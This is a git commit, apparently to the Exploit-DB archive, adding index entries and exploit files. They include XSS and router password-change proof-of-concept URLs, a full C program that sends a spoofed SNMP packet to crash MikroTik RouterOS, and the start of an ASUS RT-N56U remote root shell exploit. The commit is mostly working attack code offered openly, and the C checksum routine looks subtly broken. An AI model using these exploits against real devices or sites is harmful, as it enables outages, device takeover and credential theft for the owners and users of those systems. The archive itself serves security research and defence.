Updated 01_22_2014

2014-01-22 04:23:46 +00:00 · 2014-01-22 04:23:46 +00:00 · 9714bc13e9
commit 9714bc13e9
parent acf3e755a7
47 changed files with 1508 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -27711,6 +27711,7 @@ id,file,description,date,author,platform,type,port
 30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 modules/banners/click.php bid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
 30875,platforms/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 modules/arcade/index.php gid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
 30876,platforms/php/webapps/30876.txt,"Falcon Series One 1.4.3 stable Multiple Input Validation Vulnerabilities",2007-11-10,MhZ91,php,webapps,0
 30877,platforms/php/webapps/30877.txt,"Roundcube Webmail 0.1 CSS Expression Input Validation Vulnerability",2007-11-10,"Tomas Kuliavas",php,webapps,0
 30878,platforms/php/webapps/30878.txt,"Bitweaver 1.x/2.0 users/register.php URL XSS",2007-11-10,Doz,php,webapps,0
 30879,platforms/php/webapps/30879.txt,"Bitweaver 1.x/2.0 search/index.php URL XSS",2007-11-10,Doz,php,webapps,0
 30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 search/index.php highlight Parameter SQL Injection",2007-11-10,Doz,php,webapps,0
@ -27727,6 +27728,7 @@ id,file,description,date,author,platform,type,port
 30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0
 30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0
 30893,platforms/php/webapps/30893.txt,"PHP Security Framework Multiple Input Validation Vulnerabilities",2007-12-17,DarkFig,php,webapps,0
 30894,platforms/linux/dos/30894.txt,"PeerCast 0.12 HandshakeHTTP Multiple Buffer Overflow Vulnerabilities",2007-12-17,"Luigi Auriemma",linux,dos,0
 30895,platforms/linux/remote/30895.pl,"Perl Net::DNS 0.48/0.59/0.60 DNS Response Remote Denial of Service Vulnerability",2007-12-17,beSTORM,linux,remote,0
 30896,platforms/multiple/dos/30896.txt,"Appian Business Process Management Suite 5.6 Remote Denial of Service Vulnerability",2007-12-17,"Chris Castaldo",multiple,dos,0
 30897,platforms/windows/remote/30897.html,"iMesh 7 'IMWebControl' ActiveX Control Code Execution Vulnerability",2007-12-17,rgod,windows,remote,0
@ -27738,6 +27740,7 @@ id,file,description,date,author,platform,type,port
 30903,platforms/multiple/dos/30903.c,"id3lib ID3 Tags Buffer Overflow Vulnerability",2007-12-19,"Luigi Auriemma",multiple,dos,0
 30905,platforms/multiple/remote/30905.txt,"Adobe Flash Player 8.0.34.0/9.0.x main.swf baseurl Parameter asfunction: Protocol Handler XSS",2007-12-18,"Rich Cannings",multiple,remote,0
 30906,platforms/multiple/dos/30906.c,"ProWizard 4 PC 1.62 Multiple Remote Stack Based Buffer Overflow Vulnerabilities",2007-12-19,"Luigi Auriemma",multiple,dos,0
 30907,platforms/linux/remote/30907.txt,"Adobe Flash Player  7.0.x/8.0.x/9.0.x ActiveX Control 'navigateToURL' API Cross Domain Scripting Vulnerability",2007-12-18,"Adam Barth",linux,remote,0
 30908,platforms/windows/remote/30908.txt,"SoapUI 4.6.3 - Remote Code Execution",2014-01-14,"Barak Tawily",windows,remote,0
 30909,platforms/php/webapps/30909.html,"Auto Classifieds Script 2.0 - Add Admin CSRF Vulnerability",2014-01-14,"HackXBack ",php,webapps,80
 30910,platforms/php/webapps/30910.txt,"PHPJabbers Job Listing Script - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80
@ -27764,6 +27767,7 @@ id,file,description,date,author,platform,type,port
 30931,platforms/php/webapps/30931.txt,"Logaholic index.php conf Parameter XSS",2007-12-24,malibu.r,php,webapps,0
 30932,platforms/php/webapps/30932.txt,"Logaholic profiles.php newconfname Parameter XSS",2007-12-24,malibu.r,php,webapps,0
 30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 Crafted ZPL File Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0
 30934,platforms/windows/dos/30934.txt,"Total Player 3.0 M3U File Denial of Service Vulnerability",2007-12-25,"David G.M.",windows,dos,0
 30935,platforms/hardware/remote/30935.txt,"ZyXEL P-330W Multiple Vulnerabilities",2007-12-25,santa_clause,hardware,remote,0
 30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0
 30937,platforms/php/webapps/30937.txt,"Limbo CMS 1.0.4 'com_option' Parameter Cross-Site Scripting Vulnerability",2007-12-25,"Omer Singer",php,webapps,0
@ -27772,6 +27776,8 @@ id,file,description,date,author,platform,type,port
 30940,platforms/asp/webapps/30940.txt,"IPortalX forum/login_user.asp Multiple Parameter XSS",2007-12-27,Doz,asp,webapps,0
 30941,platforms/asp/webapps/30941.txt,"IPortalX blogs.asp Date Parameter XSS",2007-12-27,Doz,asp,webapps,0
 30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0
 30943,platforms/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,dos,0
 30944,platforms/multiple/remote/30944.txt,"Feng 0.1.15 Multiple Remote Buffer Overflow and Denial of Service Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,remote,0
 30945,platforms/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus 'faq.php' Cross-Site Scripting Vulnerability",2007-12-28,"Juan Galiana Lara",php,webapps,0
 30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 (managetimetracker.php, id param) - SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80
 30947,platforms/php/webapps/30947.txt,"NetBizCity FaqMasterFlexPlus 'faq.php' SQL Injection Vulnerability",2007-12-28,"Juan Galiana Lara",php,webapps,0
@ -27797,6 +27803,8 @@ id,file,description,date,author,platform,type,port
 30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 user/remindComplete email Parameter XSS",2007-12-31,Doz,php,webapps,0
 30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 'htcmime.php' Source Code Information Disclosure Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
 30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 'AjaxSearch.php' Local File Include Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
 30970,platforms/multiple/local/30970.txt,"White_Dune 0.29beta791 Multiple Local Code Execution Vulnerabilities",2008-01-02,"Luigi Auriemma",multiple,local,0
 30971,platforms/linux/remote/30971.txt,"Georgia SoftWorks Secure Shell Server 7.1.3 Multiple Remote Code Execution Vulnerabilities",2007-01-02,"Luigi Auriemma",linux,remote,0
 30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 'csPreloader' Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0
 30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0
 30975,platforms/cgi/webapps/30975.txt,"W3-mSQL Error Page Cross-Site Scripting Vulnerability",2008-01-03,vivek_infosec,cgi,webapps,0
@ -27812,6 +27820,9 @@ id,file,description,date,author,platform,type,port
 30985,platforms/linux/dos/30985.txt,"'libcdio' 0.7x GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities",2007-12-30,"Devon Miller",linux,dos,0
 30987,platforms/php/webapps/30987.txt,"netRisk 1.9.7 'index.php' Remote File Include Vulnerability",2008-01-04,S.W.A.T.,php,webapps,0
 30988,platforms/php/webapps/30988.txt,"Rotabanner Local 2/3 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0
 30989,platforms/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 'msvcrt.dll' Exception Handling Remote Denial Of Service Vulnerability",2008-01-04,"Luigi Auriemma",multiple,dos,0
 30990,platforms/multiple/dos/30990.txt,"Foxit WAC Server 2.0 Build 3503 Denial of Service Vulnerability",2008-01-04,"Luigi Auriemma",multiple,dos,0
 30991,platforms/multiple/dos/30991.txt,"Pragma TelnetServer 7.0.4.589 NULL-Pointer Dereference Denial of Service Vulnerability",2008-01-04,"Luigi Auriemma",multiple,dos,0
 30992,platforms/php/webapps/30992.txt,"Strawberry 1.1.1 'html.php' Remote Code Execution Vulnerability",2008-01-07,"Eugene Minaev",php,webapps,0
 30993,platforms/asp/webapps/30993.txt,"Snitz Forums 2000 3.4.5/3.4.6 Multiple Cross-Site Scripting Vulnerabilities",2008-01-07,Doz,asp,webapps,0
 30994,platforms/php/webapps/30994.html,"eTicket 1.5.5.2 admin.php CSRF",2008-01-07,L4teral,php,webapps,0
@ -27819,6 +27830,7 @@ id,file,description,date,author,platform,type,port
 30996,platforms/php/webapps/30996.txt,"eTicket 1.5.5.2 search.php Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0
 30997,platforms/php/webapps/30997.txt,"eTicket 1.5.5.2 admin.php Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0
 30998,platforms/linux/remote/30998.py,"SynCE 0.92 'vdccm' Daemon Remote Command Injection Vulnerability",2008-01-07,"Alfredo Ortega",linux,remote,0
 30999,platforms/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 Local Privilege Escalation Vulnerability",2008-01-07,"Ruben Santamarta ",windows,local,0
 31000,platforms/php/webapps/31000.txt,"SysHotel On Line System 'index.php' Local File Include Vulnerability",2008-01-08,p4imi0,php,webapps,0
 31001,platforms/php/webapps/31001.txt,"IceWarp Mail Server 9.1.1 'admin/index.html' Cross-Site Scripting Vulnerability",2008-01-08,Ekin0x,php,webapps,0
 31002,platforms/linux/dos/31002.txt,"xine-lib <= 1.1.9 'rmff_dump_cont()' Remote Heap Buffer Overflow Vulnerability",2008-01-09,"Luigi Auriemma",linux,dos,0
@ -27835,6 +27847,7 @@ id,file,description,date,author,platform,type,port
 31014,platforms/windows/dos/31014.py,"haneWIN DNS Server 1.5.3 - Denial of Service",2014-01-17,sajith,windows,dos,53
 31015,platforms/php/webapps/31015.txt,"bloofox CMS 0.5.0 - Multiple Vulnerabilities",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,80
 31017,platforms/asp/webapps/31017.php,"SmarterMail Enterprise and Standard <=11.x - Stored XSS",2014-01-17,"Saeed reza Zamanian",asp,webapps,80
 31018,platforms/linux/dos/31018.txt,"GStreamer 0.10.15 Multiple Unspecified Remote Denial of Service Vulnerabilities",2008-01-11,"Sam Hocevar",linux,dos,0
 31020,platforms/php/webapps/31020.txt,"Moodle <= 1.8.3 'install.php' Cross Site Scripting Vulnerability",2008-01-12,"Hanno Bock",php,webapps,0
 31021,platforms/osx/dos/31021.html,"Apple Safari <= 2.0.4 KHTML WebKit Remote Denial of Service Vulnerability",2008-01-12,"David Barroso",osx,dos,0
 31022,platforms/php/webapps/31022.txt,"PHP Running Management 1.0.2 'index.php' Cross Site Scripting Vulnerability",2008-01-13,"Christophe VG",php,webapps,0
@ -27847,6 +27860,8 @@ id,file,description,date,author,platform,type,port
 31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin Audio CAPTCHA Security Bypass Vulnerability",2008-01-15,Romero,php,webapps,0
 31030,platforms/php/webapps/31030.pl,"SpamBam WordPress Plugin Key Calculation Security Bypass Vulnerability",2007-01-15,Romero,php,webapps,0
 31031,platforms/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 URI Security Bypass Vulnerability",2008-01-16,nnposter,hardware,remote,0
 31032,platforms/windows/remote/31032.txt,"BitTorrent 6.0 and uTorrent 1.6/1.7 Peers Window Remote Code Execution Vulnerability",2008-01-16,"Luigi Auriemma",windows,remote,0
 31033,platforms/hardware/webapps/31033.py,"ASUS RT-N56U - Remote Root Shell Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",hardware,webapps,80
 31034,platforms/php/webapps/31034.txt,"MyBB <= 1.2.10 'moderation.php' Multiple SQL Injection Vulnerabilities",2008-01-16,waraxe,php,webapps,0
 31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0
 31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0
@ -27886,3 +27901,34 @@ id,file,description,date,author,platform,type,port
 31071,platforms/cgi/webapps/31071.txt,"VB Marketing 'tseekdir.cgi' Local File Include Vulnerability",2008-01-28,"Sw33t h4cK3r",cgi,webapps,0
 31072,platforms/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 FileUpload Class Unauthorized File Upload Vulnerability",2007-01-05,titon,windows,remote,0
 31073,platforms/java/webapps/31073.html,"SunGard Banner Student 7.3 'add1' Parameter Cross-Site Scripting Vulnerability",2008-01-29,"Brendan M. Hickey",java,webapps,0
 31074,platforms/php/webapps/31074.txt,"Nucleus CMS <= 3.22 'action.php' Cross-Site Scripting Vulnerability",2008-01-20,"Alexandr Polyakov",php,webapps,0
 31075,platforms/php/webapps/31075.txt,"AmpJuke 0.7 'index.php' Cross-Site Scripting Vulnerability",2008-01-29,ShaFuck31,php,webapps,0
 31076,platforms/linux/remote/31076.py,"MPlayer 1.0rc2 'demux_mov.c' Remote Code Execution Vulnerability",2008-02-04,"Felipe Manzano",linux,remote,0
 31077,platforms/php/webapps/31077.txt,"Mambo/Joomla 'com_buslicense' Component 'aid' Parameter SQL Injection Vulnerability",2008-01-30,S@BUN,php,webapps,0
 31078,platforms/hardware/remote/31078.txt,"2Wire Routers 'H04_POST' Access Validation Vulnerability",2008-01-30,"Oligarchy Oligarchy",hardware,remote,0
 31079,platforms/php/webapps/31079.txt,"webSPELL 4.1.2 'whoisonline.php' Cross-Site Scripting Vulnerability",2008-01-30,NBBN,php,webapps,0
 31080,platforms/php/webapps/31080.txt,"YeSiL KoRiDoR Ziyaretçi Defteri 'index.php' SQL Injection Vulnerability",2008-01-30,ShaFuck31,php,webapps,0
 31081,platforms/cgi/webapps/31081.txt,"OpenBSD 4.1 bgplg 'cmd' Parameter Cross-Site Scripting Vulnerability",2007-10-10,"Anton Karpov",cgi,webapps,0
 31082,platforms/php/webapps/31082.txt,"Liferay Enterprise Portal 4.3.6 User-Agent HTTP Header Cross Site Scripting Vulnerability",2008-01-31,"Tomasz Kuczynski",php,webapps,0
 31083,platforms/php/webapps/31083.txt,"Nilson's Blogger 0.11 'comments.php' Local File Include Vulnerability",2008-01-31,muuratsalo,php,webapps,0
 31084,platforms/php/webapps/31084.txt,"Archimede Net 2000 'E-Guest_show.php' SQL Injection Vulnerability",2008-02-01,"Sw33t h4cK3r",php,webapps,0
 31085,platforms/php/webapps/31085.txt,"Doodle4Gift - Multiple Vulnerabilities",2014-01-20,Dr.NaNo,php,webapps,80
 31086,platforms/php/webapps/31086.php,"AfterLogic Pro and Lite 7.1.1.1 - Stored XSS",2014-01-20,"Saeed reza Zamanian",php,webapps,80
 31087,platforms/hardware/webapps/31087.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - Stored XSS Vulnerability",2014-01-20,"Rakesh S",hardware,webapps,80
 31088,platforms/hardware/webapps/31088.py,"BLUE COM Router 5360/52018 - Password Reset Exploit",2014-01-20,KAI,hardware,webapps,80
 31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack-based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0
 31091,platforms/php/webapps/31091.txt,"Domain Trader 2.0 'catalog.php' Cross-Site Scripting Vulnerability",2008-02-02,Crackers_Child,php,webapps,0
 31092,platforms/php/webapps/31092.txt,"WP-Footnotes 2.2 WordPress Plugin Multiple Remote Vulnerabilities",2008-02-02,NBBN,php,webapps,0
 31093,platforms/php/webapps/31093.txt,"ITechClassifieds ViewCat.php CatID Parameter SQL Injection",2008-02-02,Crackers_Child,php,webapps,0
 31094,platforms/php/webapps/31094.txt,"ITechClassifieds ViewCat.php CatID Parameter XSS",2008-02-02,Crackers_Child,php,webapps,0
 31095,platforms/novell/remote/31095.txt,"Novell GroupWise 5.57e/6.5.7/7.0 WebAccess Multiple Cross Site Scripting Vulnerabilities",2008-01-31,"Frederic Loudet",novell,remote,0
 31096,platforms/php/webapps/31096.txt,"WordPress Plugin ShiftThis Newsletter SQL Injection Vulnerability",2008-02-03,S@BUN,php,webapps,0
 31097,platforms/php/webapps/31097.txt,"CruxCMS 3.0 'search.php' Cross-Site Scripting Vulnerability",2008-02-04,Psiczn,php,webapps,0
 31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta 'login.php' SQL Injection Vulnerability",2008-02-04,Psiczn,php,webapps,0
 31099,platforms/php/webapps/31099.txt,"Codice CMS 'login.php' SQL Injection Vulnerability",2008-02-04,Psiczn,php,webapps,0
 31100,platforms/multiple/dos/31100.txt,"Anon Proxy Server 0.100/0.102 Remote Authentication Buffer Overflow Vulnerability",2008-02-04,L4teral,multiple,dos,0
 31101,platforms/php/webapps/31101.txt,"HispaH Youtube Clone 'load_message.php' Cross-Site Scripting Vulnerability",2008-02-04,Smasher,php,webapps,0
 31102,platforms/hardware/dos/31102.c,"MikroTik RouterOS 3.0 SNMP SET Denial of Service Vulnerability",2008-02-04,ShadOS,hardware,dos,0
 31103,platforms/asp/webapps/31103.txt,"AstroSoft HelpDesk operator/article/article_search_results.asp txtSearch Parameter XSS",2008-02-04,"Alexandr Polyakov",asp,webapps,0
 31104,platforms/asp/webapps/31104.txt,"AstroSoft HelpDesk operator/article/article_attachment.asp Attach_Id Parameter XSS",2008-02-04,"Alexandr Polyakov",asp,webapps,0
 31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 DELE Command Remote Buffer Overflow Vulnerability",2008-02-04,j0rgan,windows,dos,0
--- a/platforms/asp/webapps/31103.txt
+++ b/platforms/asp/webapps/31103.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/27610/info
 AstroSoft HelpDesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
 http://www.example.com/[installdir]/operator/article/article_search_results.asp?txtSearch="></form><IMG SRC=javascript:alert(&#039;DSecRG XSS&#039;)>"
--- a/platforms/asp/webapps/31104.txt
+++ b/platforms/asp/webapps/31104.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/27610/info
 AstroSoft HelpDesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 http://www.example.com/[installdir]/operator/article/article_attachment.asp?Attach_Id="<script>alert(&#039;DSecRG XSS&#039;)</script>
--- a/platforms/cgi/webapps/31081.txt
+++ b/platforms/cgi/webapps/31081.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/27535/info
 OpenBSD bgplg is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 bgplg shipped with OpenBSD 4.1 is vulnerable; other versions may also be affected. 
 http://www.example.com/cgi-bin/bgplg?cmd=show+version<script>alert("OpenBSD%20XSS)</script> 
--- a/platforms/hardware/dos/31102.c
+++ b/platforms/hardware/dos/31102.c
@ -0,0 +1,204 @@
 source: http://www.securityfocus.com/bid/27599/info
 MikroTik RouterOS is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash an affected router, denying service to legitimate users.
 This issue affects versions up to and including RouterOS 3.2. 
 /* --------------------------------------------------------------------------
 *                          (c) ShadOS 2008
 *       _  _     _ _ _  __     _      _   _      
 *      | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___
 *      | __ / -_) | | ' <| ' \| / _` | ' \  _(_-<
 *      |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/
 *        hellknights.void.ru    |___/  .0x48k.    
 *
 * --------------------------------------------------------------------------
 *
 *  MicroTik RouterOS <=3.2 SNMPd snmp-set DoS exploit. Other OSs may be vulnurable (fe. Linux )
 *  Don't forget to visit our site and my homepage for new releases:
 *  http://hellknights.void.ru
 *  http://shados.freeweb7.com
 *  Also, you can mail me any bugs or suggestions:
 *  mailto: shados /at/ mail /dot/ ru
 *
 *  Thanks 2 antichat.ru and all my friends.
 * --------------------------------------------------------------------------
 *
 *  Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation.
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2, or (at your option)
 *  any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software Foundation,
 *  Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
 *
 * --------------------------------------------------------------------------
 */
 #include <stdio.h>
 #include <stdlib.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <netinet/in.h>
 #include <netinet/ip.h>
 #include <netinet/udp.h>
 #include <netdb.h>
 #include <memory.h>
 #include <string.h>
 char evilcode[] = {
 0x19, 0x02, 0x02, 0x1e, 0x0c, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x0d, 0x30, 0x0b, 0x06, 0x07, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x05, 0x00, 0x00
 };
 unsigned short in_cksum(addr, len)
 u_short *addr;
 int len;
 {
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;
  while (nleft > 1) {
     sum += *w++;
     sum += *w++;
     nleft -= 2;
  }
  if (nleft == 1) {
     *(u_char *) (&answer) = *(u_char *) w;
     sum += answer;
  }
  sum = (sum >> 17) + (sum & 0xffff);
  sum += (sum >> 17);
  answer = -sum;
  return (answer);
 }
 int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len)
 {
  char *packet;
  struct sockaddr_in dstaddr;
  struct iphdr *ip;
  struct udphdr *udp;
  packet = (char *)malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+len);
  memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len);
  if (packet == NULL) { perror("Malloc failed\n"); exit(-1); }
  ip = (struct iphdr *)packet;
  udp = (struct udphdr *)(packet+sizeof(struct iphdr));
  ip->saddr = *saddr;
  ip->daddr = *daddr;
  ip->version = 4;
  ip->ihl = 5;
  ip->ttl = 255;
  ip->id = htons((unsigned short) rand());
  ip->protocol = IPPROTO_UDP;
  ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len);
  ip->check = in_cksum(ip, sizeof(struct iphdr));
  udp->source = htons(sport);
  udp->dest = htons(dport);
  udp->len = htons(sizeof(struct udphdr) + len);
  memcpy(packet+(sizeof(struct iphdr) + sizeof(struct udphdr)),data,len);
  dstaddr.sin_family = AF_INET;
  dstaddr.sin_addr.s_addr = *daddr;
  if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0)
    perror("sendto() failed");
  free(packet);
 }
 char * makereq(char *community,int *size)
 {
 char *buf;
 char *ptr;
 int len;
 int i;
 len = 5 + strlen(community) + sizeof(evilcode);
 buf = (char *)malloc(len);
 ptr = buf;
 *ptr++ = 0x30;
 *ptr++ = len;
 /* Snmp Version */
 *ptr++ = 0x02;
 *ptr++ = 0x01;
 *ptr++ = 0x00;
 /* Community */
 *ptr++ = 0x04;
 *ptr++ = strlen(community);
 strcpy(ptr,community);
 ptr = ptr + strlen(community);
 *ptr++ = 0xa3; /* Set Request */
 memcpy(ptr, evilcode, sizeof(evilcode));
 ptr = ptr + sizeof(evilcode);
 *size = len+2;
 return buf;
 }
 int erexit(char *msg)
 {
 printf("%s\n",msg);
 exit (-1) ;
 }
 int usage()
 {
 printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n");
 }
 int main(int argc, char **argv)
 {
 char *saddr,*daddr,*community;
 unsigned char *buf;
 int size;
 int sock;
 unsigned long lsaddr,ldaddr;
 int i;
 saddr = NULL;
 daddr = NULL;
 if (argc != 7) { usage(); erexit("not enough args\n"); }
 if (!strcmp(argv[1],"-s"))
   saddr = strdup(argv[2]);
 if (!strcmp(argv[3],"-d"))
   daddr = strdup(argv[4]);
 if (!strcmp(argv[5],"-c"))
   community = strdup(argv[6]);
 printf("Ok, spoofing packets from %s to %s\n",saddr,daddr);
 if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1)
   erexit("Invalid source/destination IP address\n");
 if (saddr == NULL) { usage(); erexit("No Source Address"); }
 if (daddr == NULL) { usage(); erexit("No Dest Address"); }
 sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
 if (sock == -1)
   erexit("Couldnt open Raw socket!(Are you root?)\n");
 lsaddr = inet_addr(saddr);
 ldaddr = inet_addr(daddr);
 buf = makereq(community,&size);
 sendudp(sock,&lsaddr,&ldaddr,32788,161,buf,size);
 fprintf(stdout,"Sent packet. SNMPd must be down.\n");
 return 0;
 }
--- a/platforms/hardware/remote/31078.txt
+++ b/platforms/hardware/remote/31078.txt
@ -0,0 +1,13 @@
 source: http://www.securityfocus.com/bid/27516/info
 Multiple 2Wire routers are prone to an access-validation vulnerability because they fail to adequately authenticate users before performing certain actions.
 Unauthenticated attackers can leverage this issue to change the password of arbitrary user accounts on the router. Successful attacks will completely compromise affected devices.
 2Wire routers that have the 'H04_POST' page are affected by this issue.
 UPDATE: This BID has been retired because it has been found to be a duplicate of BID 27246 (2Wire Routers Cross-Site Request Forgery Vulnerability).
 UPDATE (February 1, 2008): This BID is being reinstated. Further investigation and new information reveal that this vulnerability differs from the one described in BID 27246. 
 http://www.example.com/xslt?PAGE=H04_POST&PASSWORD=admin&PASSWORD_CONF=admin 
--- a/platforms/hardware/webapps/31033.py
+++ b/platforms/hardware/webapps/31033.py
@ -0,0 +1,256 @@
 #!/usr/bin/env python
 from time import sleep
 from sys import exit
 import urllib2, signal, struct, base64, socket, ssl
 # [*] Title: ASUS RT-N56U Remote Root Shell Exploit - apps_name
 # [*] Discovered and Reported: October 2013
 # [*] Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE 
 # [*] Contact: Twitter - @rootHak42
 # [*] Software Vendor: http://asus.com
 # [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/
 # [*] Software: httpd (Listens on TCP/80 and TCP/443)
 # [*] Tested Firmware Versions: 3.0.0.4.374_979 (Other versions may be vulnerable)
 # [*] CVE: ASUS RT-N56U Buffer Overflow: CVE-2013-6343
 #
 # [*] Overview:
 #       Multiple ASUS routers including the RT-N56U and RT-AC66U have the ability to install
 #       supplemental applications. This install process is handled by the routers web server,
 #       and is susceptible to multiple Buffer Overflow attacks.
 #
 #       Vulnerable Web Page: APP_Installation.asp 
 #       Vulnerable HTML Parameters: apps_name, apps_flag
 #       Vulneralbe Source File: web.c of httpd code
 #       *Firmware versions prior to the tested version were vulnerable to this attack.
 #
 def fingerPrint(host, port, netSock):
    fprint = ["RT-N56U"]
    found = None
    print " [*] Preparing to fingerprint the server."
    try:
        print " [*] Connecting to %s on port %d." % (host, port)
        netSock.connect((host, port))
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)
    try:
        print " [*] Sending fingerprint request."
        netSock.send("HEAD / HTTP/1.1\r\n\r\n")
        netData = netSock.recv(1024)
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)
    try:
        print " [*] Closing network socket.\n"
        netSock.close()
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
    for item in fprint:
        if item in netData:
            print " [!!!] Target system found in signature list - Result: %s [!!!]\n" % item
            sleep(1)
            found = item
    if found == None:
        print " [!!!] Server banner doesn't match available targets. [!!!]\n"
        sleep(1)
        exit(0)
    else:
        return found
 def targURL():
 	while True:
 		URL = raw_input("\n[*] Please enter the URL of the router. Ex. http://192.168.1.1\n>")
 		if len(URL) != 0 and URL[0:7] == "http://" or URL[0:8] == "https://":
 			return URL.lower()
 		else:
 			print "\n\n [!!!] Target URL cant be null and must contain http:// or https:// [!!!]\n"
 			sleep(1)
 def creds():
    while True:
        User = raw_input("\n[*] Please enter the username for the routers HTTP Basic Authentication:\n>")
        Pass = raw_input("\n[*] Please enter the password for the supplied username:\n>")
        if len(User) != 0:
            return User, Pass
        else:
            print "\n [!!!] Username cant be null [!!!]\n"
